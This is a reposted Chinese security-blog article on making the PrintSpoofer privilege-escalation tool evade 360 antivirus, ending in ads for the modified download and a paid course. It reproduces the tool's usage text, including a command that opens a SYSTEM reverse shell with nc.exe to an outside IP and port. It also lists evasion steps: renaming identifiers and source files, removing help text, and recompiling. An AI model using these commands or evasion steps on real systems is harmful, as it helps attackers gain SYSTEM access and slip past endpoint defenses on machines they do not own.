printspoofer免杀过360全家桶

admin 2023年10月31日10:10:39评论31 views字数 1099阅读3分39秒阅读模式

1.printspoofer介绍


printspoofer提权工具目前主流的提权工具之一

使用方法

C:TOOLS>PrintSpoofer.exe -hPrintSpoofer v0.1 (by @itm4n)  Provided that the current user has the SeImpersonate privilege, this tool will leverage the Print  Spooler service to get a SYSTEM token and then run a custom command with CreateProcessAsUser()Arguments:  -c <CMD>    Execute the command *CMD*  -i          Interact with the new process in the current command prompt (default is non-interactive)  -d <ID>     Spawn a new process on the desktop corresponding to this session *ID* (check your ID with qwinsta)  -h          That's me :)Examples:  - Run PowerShell as SYSTEM in the current console      PrintSpoofer.exe -i -c powershell.exe  - Spawn a SYSTEM command prompt on the desktop of the session 1      PrintSpoofer.exe -d 1 -c cmd.exe  - Get a SYSTEM reverse shell      PrintSpoofer.exe -c "c:Tempnc.exe 10.10.13.37 1337 -e cmd"


源码下载

https://github.com/whojeff/PrintSpoofer

vs2019编译发现360全家桶查杀

printspoofer免杀过360全家桶

printspoofer免杀过360全家桶


2.免杀处理

  1. printspoofer 将这个关键词替换成其他字符串 如 moonsec

  2. PrintSpoofer.cpp PrintSpoofer.h 全部改为 moonsec

  3. 帮助注释全部处理掉

  4. release x64 重新生成


printspoofer免杀过360全家桶


3.最终效果

3**安全卫士 3**杀毒软件 均没拦截和查杀

免杀处理时间 2020年8月21日

printspoofer免杀过360全家桶


printspoofer免杀过360全家桶


4.下载

关注公众号 回复  printspoofer 即可下载处理好的工具


5.培训项目

暗月的培训体系 目前全部完成 费用2300 有兴趣添加moonsec微信即可


printspoofer免杀过360全家桶

printspoofer免杀过360全家桶

printspoofer免杀过360全家桶

6.正文

不会真的以为没正文图片 不可能的 

printspoofer免杀过360全家桶

printspoofer免杀过360全家桶

printspoofer免杀过360全家桶


原文始发于微信公众号(moonsec):printspoofer免杀过360全家桶

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年10月31日10:10:39
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   printspoofer免杀过360全家桶http://cn-sec.com/archives/565408.html

发表评论

匿名网友 填写信息